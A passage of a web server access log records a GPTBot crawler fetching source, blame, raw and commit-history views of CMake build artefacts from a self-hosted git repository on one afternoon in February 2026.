Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42455] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21737] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21736] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21735] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11051] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10091] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10267] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10268] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10266] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10262] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11489] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21635] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10096] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10310] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33372] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33370] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33370] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33370] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10526] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33666] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42453] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42455] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42454] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 